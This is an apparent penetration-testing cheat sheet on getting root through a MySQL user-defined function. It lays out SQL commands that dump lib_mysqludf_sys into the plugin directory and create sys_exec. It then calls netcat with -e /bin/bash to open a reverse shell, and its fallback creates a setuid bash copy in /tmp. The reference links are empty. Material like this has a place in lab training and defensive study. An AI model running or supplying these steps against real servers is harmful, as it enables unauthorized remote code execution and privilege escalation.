# MySQL User Defined Function If we find root credentials to an internal mysql server it is game over. Once we log in, we need to locate plugin paths and see if the secure file priv is null so that we can load data into the database. ``` show variables like '%plugin%'; ``` ![](https://3418038199-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyTPWZkKJbJfX8uHiRzmn%2Fuploads%2FoH3FrDIr5OsLqH5NjIeY%2Fimage.png?alt=media\&token=99abde7c-2771-4ed4-a870-faaa270405cf) Take note of the plugin directory. ``` show variables like '%secure_file_priv%'; ``` ![](https://3418038199-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyTPWZkKJbJfX8uHiRzmn%2Fuploads%2F2SdHRVgWssVEPXdbRbLQ%2Fimage.png?alt=media\&token=50ba0e63-29af-4b22-98d4-efa7f27e9ee7) Make sure that this one is null, otherwise this shit is not vulnerable because we won't be able to load data. Now literally just follow this. ``` # Local method use mysql; create table tranilment(line blob); insert into tranilment values(load_file('/tmp/lib_mysqludf_sys_64.so')); select * from tranilment into dumpfile '//lib_mysqludf_sys_64.so'; create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so'; select sys_exec('nc 1234 -e /bin/bash'); ``` You should get a reverse shell. If by any reason there is a firewall blocking you from outbound connections ok not an issue. Try this: ``` select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash'); ``` Here are some articles to help you out: {% embed url="" %} {% embed url="" %} {% embed url="" %} This is the exploit download based on arch {% endembed %} Sometimes it'll give you an error because there is an issue doing the dumpfile process. {% embed url="" %} This is to troubleshoot it, just literally copy .so file into the plugin directory manually via the command line. {% embed url="" %}

Examples:

Banzai